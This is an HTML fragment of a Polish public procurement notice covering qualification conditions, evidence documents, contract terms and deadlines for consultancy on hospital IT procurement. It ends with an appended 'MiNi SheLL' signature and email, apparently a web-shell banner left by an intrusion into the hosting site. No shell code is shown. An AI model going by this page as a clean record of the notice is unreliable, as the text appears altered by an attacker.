mianowicie, iż w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał, a w przypadku świadczeń powtarzających się lub ciągłych również, wykonuje również należycie:<br/>a)	co najmniej 10 usług, polegających na opracowaniu OPZ dotyczącego dostawy i wdrożenia systemów informatycznych oraz infrastruktury serwerowej dedykowanych dla podmiotów leczniczych – Zamawiający wymaga, aby wykazane usługi dotyczyły dokumentów OPZ, które zostały odebrane od Wykonawcy przez Zamawiającego i w oparciu, o które w okresie ostatnich 3 lat zostały przeprowadzone postępowania o udzielenie zamówienia publicznego, w wyniku których zostały zawarte umowy z Wykonawcami, z zastrzeżeniem, iż wartość co najmniej 5 zawartych umów wynosiła min. 2 mln złotych brutto, a pozostałych min. 1 mln złotych brutto;<br/>b)	co najmniej 2 usługi dotyczące doradztwa w zakresie dostawy i wdrożenia wspólnego systemu informatycznego dla co najmniej 10 podmiotów leczniczych w których Wykonawca sporządził uwagi oraz rekomendacje dla odbioru Dokumentacji Analizy Przedwdrożeniowej Głównego Wykonawcy generalnego systemu, przy czym jedna z tych usług dotyczyła również rekomendacji w zakresie integracji systemów informatycznych z systemem P1. <br/>3.	Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej – dopuszcza łączne spełnianie warunku przez Wykonawców.<br/>4.	Zamawiający może na każdym etapie postępowania uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r. poz. 275 z późn. zm.), z innym wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 4 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Warunek dotyczący sytuacji ekonomicznej lub finansowej: dokument potwierdzający że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną ubezpieczenia nie mniejszą niż 2.000.000,00 (słownie: dwa miliony) złotych)<br/>2.	Warunek dotyczący zdolności technicznej lub zawodowej: <br/>Za spełniających ten warunek Zamawiający uzna Wykonawców, którzy złożą wykaz:<br/>a)	co najmniej 10 usług, polegających na opracowaniu OPZ dotyczącego dostawy i wdrożenia systemów informatycznych oraz infrastruktury serwerowej dedykowanych dla podmiotów leczniczych – Zamawiający wymaga, aby wykazane usługi dotyczyły dokumentów OPZ, które zostały odebrane od Wykonawcy przez Zamawiającego i w oparciu, o które w okresie ostatnich 3 lat zostały przeprowadzone postępowania o udzielenie zamówienia publicznego, w wyniku których zostały zawarte umowy z Wykonawcami, z zastrzeżeniem, iż wartość co najmniej 5 zawartych umów wynosiła min. 2 mln złotych brutto, a pozostałych min. 1 mln złotych brutto;<br/>b)	co najmniej 2 usług dotyczących doradztwa w zakresie dostawy i wdrożenia wspólnego systemu informatycznego dla co najmniej 10 podmiotów leczniczych w których Wykonawca sporządził uwagi oraz rekomendacje dla odbioru Dokumentacji Analizy Przedwdrożeniowej Głównego Wykonawcy generalnego systemu, przy czym jedna z tych usług dotyczyła również rekomendacji w zakresie integracji systemów informatycznych z systemem P1. <br/>- wykonanych w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, a w przypadku świadczeń powtarzających się lub ciągłych - również wykonywanych, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawa została wykonana lub jest wykonywana, oraz załączeniem dowodów określających, czy ta dostawa została wykonana lub jest wykonywana należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest wstanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy.<br/>- Wykaz usług należy wypełnić zgodnie z załącznikiem nr 6 do SWZ</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia wraz z ofertą przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale IX ust. 1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które części zamówienia wykonają poszczególni wykonawcy.<br/>4.	Oświadczenia i dokumenty stanowiące podmiotowe środki dowodowe potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Szczegółowo opisane w paragrafie 15 wzoru umowy (załącznik nr 5 do SWZ) <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-06-30 09:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zozwolasrodmiescie.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-06-30 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com